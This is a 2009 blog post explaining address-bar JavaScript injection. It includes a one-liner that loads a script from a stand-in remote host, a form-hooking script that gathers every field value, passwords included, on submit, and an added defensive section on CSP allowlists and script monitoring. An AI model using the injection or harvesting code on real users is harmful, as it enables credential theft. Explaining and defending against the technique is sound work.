random thoughts, formed in the twisted mind of a coder...
# Tuesday, 04 August 2009

It is still remarkably simple to get at websites and their users. Although browsers get more secure with every release and every update, there will always remain ways to get information from users while they are unaware of it.
Is it because users are ignorant? Or is it because browsers are constantly in a competition between functionality and security? Maybe both...

This post shows how to inject a JavaScript file from another domain into any web page from the address bar. It can also be injected more automatically, but that's something for another post...

I've tested this particular method on Internet Explorer 8, but I'll bet that almost all other browsers supporting HTML DOM and JavaScript have the same "feature".

If you would execute a line like the following from IE's addressbar...
  javascript:alert(document.body.innerHTML);

...it shows you the HTML of the currently loaded page (e.g. http://www.google.com/). In fact, it shows you the rendered HTML: if any script or stylesheet has altered the document since it was loaded, you get the resulting HTML, not the original source.

That it shows the code of the current page implies that the javascript: line is evaluated within the context of that page. Therefore any JavaScript can be executed in the context of that page... including the insertion of a new script element!

Now, take a look at the following line:
  javascript:var inj=document.body.appendChild(document.createElement('script'));inj.type='text/javascript';inj.src='http://remotescript.com/script.js';alert('site injected');

When executed, it loads a JavaScript from a server in another domain.

To break that up...

First create a new script element and append it to the body element...
  var inj = document.body.appendChild( document.createElement('script') );

Then set the type of the script...
  inj.type = 'text/javascript';

Set the source of the script to a remote server...
  inj.src = 'http://remotescript.com/script.js';

Report that the injection is done...
  alert('site injected');

As soon as the foreign script is inserted, the browser fetches and executes it, again within the context of the current page. That foreign script can do anything the page's own scripts can do, all without the user knowing what has been altered.

For example, the following script could have been loaded and executed...

//--------------------------------------------------
// hook every form on the page: attach a submit handler that
// hands the form being submitted to hacked() below
for (var idx = 0; idx < document.forms.length; idx++)
{
  var frm = document.forms[idx];
  // "this" is the form the handler is attached to; referring to frm here
  // would make every handler see the last form of the loop, because var
  // is function-scoped rather than block-scoped
  frm.onsubmit = function() { hacked(this); };
}
alert("forms injected");

//--------------------------------------------------
// this function is called on form submit; it collects the name and
// value of every input element that is a direct child of the form
function hacked(frm)
{
  var txt = "";

  for (var idx = 0; idx < frm.childNodes.length; idx++)
  {
    var cld = frm.childNodes[idx];
    if (cld.tagName && cld.tagName.toLowerCase() == "input")
      txt += (cld.name || "[no name]") + ":" + (cld.value || "[no value]") + "\r\n";
  }

  alert(txt + "\r\nintercepted!");
}

This script goes through the current page to find all forms and attaches to each one a function that is executed when the user presses the submit button. When the user does just that, the function goes through all the fields of the form (including password fields) and accumulates them into a string.

In this case the string is only shown to the user, but a serious hacker would use Ajax to post the data (including the URL of the page) to another server and then let the submit continue normally, so that the user remains unaware of the hack.

Using the address bar to inject JavaScript is mainly "useful" on public computers, such as library, school or conference computers.


As a developer you can't do much about this. You could submit the form from a button's onclick handler by calling form.submit() instead of using an <input type="submit"/> (that way the onsubmit event won't fire), but any decent hacker takes that into account.
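The developer-side controls available today, as an added example that is not part of the original post: a Content-Security-Policy header with a restrictive script-src directive makes the browser refuse the appended <script src="http://remotescript.com/script.js"> element, because remotescript.com is not a listed source, and an in-page audit can at least detect a script element that arrived from an unexpected origin. The functions below implement that origin allowlist in plain JavaScript; the CDN origin, the page URL and the list of script sources are constructed values, not taken from the post.

```javascript
// Added example, not code from the original post. Origins other than the
// page's own from which scripts may legitimately be loaded (assumed value).
const ALLOWED_SCRIPT_ORIGINS = ["https://cdn.example.com"];

// Value for the Content-Security-Policy header that enforces this allowlist
// in the browser: 'self' covers the page's own origin, the rest are listed.
// Such a directive also disallows inline scripts and javascript: URLs, so
// a page's existing inline code has to move into external files first.
function buildScriptSrcDirective(allowedOrigins) {
  return "script-src 'self' " + allowedOrigins.join(" ");
}

// Decide whether a script src (absolute or relative) belongs to the page's
// own origin or to one of the allowed origins. Anything that is not a
// parseable http(s) URL (javascript:, data:, garbage) is rejected. The
// comparison is on the full origin, so "www.example.com.evil.test" or a
// different port does not pass as a prefix match would.
function scriptAllowed(src, pageUrl, allowedOrigins) {
  let url;
  try {
    url = new URL(src, pageUrl);
  } catch (e) {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  const pageOrigin = new URL(pageUrl).origin;
  return url.origin === pageOrigin || allowedOrigins.includes(url.origin);
}

// Audit a list of script sources (e.g. collected from document.scripts) and
// return the ones that fall outside the allowlist. Inline scripts have an
// empty src and are skipped here: the allowlist says nothing about them.
function auditScriptSources(srcs, pageUrl, allowedOrigins) {
  return srcs.filter(function (src) {
    return src !== "" && !scriptAllowed(src, pageUrl, allowedOrigins);
  });
}

// Browser-only: watch the live document for script elements being added,
// which is exactly what the address-bar one-liner does, and report the
// offending ones. A MutationObserver fires after the element is already in
// the DOM, so this detects rather than prevents; the CSP header is the
// enforcing control, and a foreign script running in the page could also
// simply disconnect this observer.
function installScriptMonitor(doc, pageUrl, allowedOrigins, report) {
  const observer = new MutationObserver(function (mutations) {
    for (let i = 0; i < mutations.length; i++) {
      const added = mutations[i].addedNodes;
      for (let j = 0; j < added.length; j++) {
        const node = added[j];
        if (node.nodeType === 1 && node.tagName === "SCRIPT" && node.src &&
            !scriptAllowed(node.src, pageUrl, allowedOrigins)) {
          report(node.src);
        }
      }
    }
  });
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  return observer;
}

// Constructed sample: the script sources a login page might contain after
// the injection described in the post has run.
const SAMPLE_PAGE_URL = "https://www.example.com/login";
const SAMPLE_SCRIPT_SRCS = [
  "/static/app.js",                    // same origin, relative path
  "https://cdn.example.com/lib.js",    // allowed third-party origin
  "",                                  // inline script
  "http://remotescript.com/script.js"  // the injected script from the post
];

// When loaded in a browser, start watching the real document.
if (typeof document !== "undefined") {
  installScriptMonitor(document, document.URL, ALLOWED_SCRIPT_ORIGINS, function (src) {
    console.warn("unexpected script source: " + src);
  });
}
```

Sending the header `Content-Security-Policy: script-src 'self' https://cdn.example.com` is the part that actually stops the appended element from loading; the audit function gives you the same answer offline for a list of sources, and the monitor turns a report into something a logging endpoint can record.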

Tuesday, 04 August 2009 13:52:00 (W. Europe Daylight Time, UTC+02:00)
Script and HTML | Security
The opinions expressed herein are my own personal opinions and do not represent my employer's view in any way.

© Copyright 2017
Martijn Thie